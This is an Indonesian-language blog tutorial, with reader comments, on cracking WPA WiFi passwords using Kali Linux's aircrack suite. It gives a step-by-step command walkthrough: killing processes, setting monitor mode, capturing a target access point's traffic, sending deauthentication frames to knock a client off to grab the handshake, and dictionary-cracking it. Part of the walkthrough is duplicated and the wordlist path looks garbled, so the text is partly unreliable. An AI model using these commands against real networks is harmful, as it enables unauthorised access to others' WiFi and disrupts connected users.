Tutorial ini menjelaskan bagaimana menggunakan kali linux untuk mendapatkan password WiFi.
dengan hack atau crack password wifi menggunakan BACKTRACK / KALI LINUX
Preparation:
1. Aircrack, bisa di dapatkan di sini
2. Dictionary attack
Briefing
1. Hentikan semua proses yang menghambat jalannya aireplay
2. Simpan hasil monitoring
3. Lakukan aireplay untuk mendapatkan WPA Handshake
4. Crack hasil rekaman dengan dictionary attack
5. Gameover
Walkthrough
1. Hentikan semua proses yang menghambat jalannya aireplay
code:
root@gold:/# airmon-ng check kill
2. Buat interface baru dengan mode monitor menggunakan airmon-ng
code:
root@gold:/# airmon-ng start wlan0
3. Monitoring setiap akses poin yang ada di sekitar attacker
code:
root@gold:/# airodump-ng mon0
4. Pilih target, kemudian Monitoring dan simpan hasil monitoring airodump.
code:
root@red-dragon:/# airodump-ng --write output --channel 6 --bssid 58:6D:8F:3D:55:E8 mon0
Keterangan:
1. --write : berfungsi untuk menyimpan hasil monitoring
2. output : nama hasil monitoring yang di simpan [bisa diisi bebas]
3. --chanel : channel akses poin target
4. --bssid : mac address akses poin
5. Jalankan aireplay-ng untuk mendapatkan WPA Handshake
code:
root@gold:/# aireplay-ng --deauth 1 -a 58:6D:8F:3D:55:E8 -c E0:B9:A5:9D:18:94 mon0
Keterangan:
1. --deauth : berfungsi untuk deautentikasi setiap stasiun pada akses sebuah jaringan
2. -a : mac address akses poin
3. -c : mac address klien
Note:
Jika belum muncul WPA handshake, ganti mac address klien dengan yang lain.
code:
root@gold:/# aireplay-ng --deauth 1 -a 58:6D:8F:3D:55:E8 -c 58:6D:8F:3D:55:E8 mon0
root@red-dragon:/# airodump-ng --write output --channel 6 --bssid 58:6D:8F:3D:55:E8 mon0
Keterangan:
1. --write : berfungsi untuk menyimpan hasil monitoring
2. output : nama hasil monitoring yang di simpan [bisa diisi bebas]
3. --chanel : channel akses poin target
4. --bssid : mac address akses poin
5. Jalankan aireplay-ng untuk mendapatkan WPA Handshake
code:
root@gold:/# aireplay-ng --deauth 1 -a 58:6D:8F:3D:55:E8 -c E0:B9:A5:9D:18:94 mon0
Keterangan:
1. --deauth : berfungsi untuk deautentikasi setiap stasiun pada akses sebuah jaringan
2. -a : mac address akses poin
3. -c : mac address klien
Note:
Jika belum muncul WPA handshake, ganti mac address klien dengan yang lain.
code:
root@gold:/# aireplay-ng --deauth 1 -a 58:6D:8F:3D:55:E8 -c 58:6D:8F:3D:55:E8 mon0
6. Jika sudah mendapatkan WPA handshake
dari klien, langkah selanjutnya adalah menghentikan proses airodump-ng
dengan menekan tombol ctrl + c, dan cracking password dengan
aircrack-ng.
code:
root@gold:/# aircrack-ng output-01.cap -w /root/crack wpa.txt
Keterangan
1. output-01.cap harus disesuaikan dengan nama hasil monitoring yang anda kehendaki pada tahap 4
2. -w adalah metode dictionary, diikuti dengan direktori dictionary milik anda.
7. Langkah selanjutnya adalah mengetes kebenaran dari metode ini dengan cara mengkonekan dengan wifi kita =)
sekian dulu tutorial | menggunakan kali linux
sampai jumpa lagi di tutorial selanjutnya keep feel free to shared
sampai jumpa lagi di tutorial selanjutnya keep feel free to shared
6 comments:
Makasih atas infonya mas..sangat membantu sekali dan bermamfaat..salam kenal dari agen obat herbal...@!!
siip gan , semoga lancar ya bisnisnya jng lupa selalu review article ane
numpang share :D
spt pny red-dragon
Slmat pagi gan...
Gan ane mau brtanya nih... apa gk ada cara lain untuk crack password selain dengan worlist atau dngan john dn crunch
Dan Apa ada cra untuk mempercpat proses untuk crack password
Krna ane sdah menggunkan 3 cara trsbut dn memkan wktu yg ckup lama
Dan klo dngan reaver kslitan ada di wps yg di knci...
Seandainya ada cara crack wpa/wpa2 smudah dn cpat sprti wep..
Ditnggu blsannya....
Wsslam......
yup, benar sekali, saya memang satu komunitas dan sama sama pendiri t193r team bersama red-dragon, dan blusploit. beberapa minggu lalu kami baru saja kehilangan Red, beliau meninggal karena kanker darah.
Post a Comment